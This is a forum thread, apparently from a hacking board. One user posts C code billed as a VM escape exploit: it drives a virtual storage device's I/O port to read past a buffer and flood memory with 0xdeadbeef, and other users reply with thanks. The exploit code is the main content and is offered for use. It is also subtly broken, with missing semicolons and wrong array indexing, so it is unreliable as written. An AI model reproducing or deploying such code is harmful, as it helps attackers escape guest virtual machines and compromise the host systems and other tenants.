VM Escape 0xDeadBeef

[Ernestbok]

void exploit() {
static const uint8_t cdb[1] = {0};
static const short port = 0x434;
static const uint32_t buffer_size = 1024;

// reset the state machine
__outbyte(port+3, 0);

// initiate a write operation
__outbyte(port+0, 0); // TargetDevice (0)
__outbyte(port+0, 1); // direction (to device)

__outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
__outbyte(port+0, buffer_size); // bugger length low
__outbyte(port+0, buffer_size >> 8); // buffer length mid

for(int i = 0; i < sizeof(cdb); i++)
__outbyte(port+0, cdb);


// move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
char buf[buffer_size];
__inbytestring(port+1, buf, buffer_size - 1) // Read bufsize-1
__inbytestring(port+1, buf, 9) // Read 9 more bytes

for(int i = 0; i < sizeof(buf); i += 4)
*((uint32_t*)(&buf)) = 0xdeadbeef
for(int i = 0; i < 10000; i++)
__outbytestring(port+1, buf, sizeof(buf))
}
Twitter.com/ClumsyLulz
T.me/SleepTheGod
Github.com/SleepTheGod
Pastebin.com/u/Sleep

 

[malkk]

awesome share

 

[totti_moti_92]

woooow!

 

[pluton25]

Thanks, let me see

 

[coolguy123]

qualaity member

 

[Crunchz6]

awesomeee!

 

[lenny1]

thank you so much

 

[pxrplu]

thanks man!

 

[Tommy64]

big leak

 

[XsamsamX]

tyy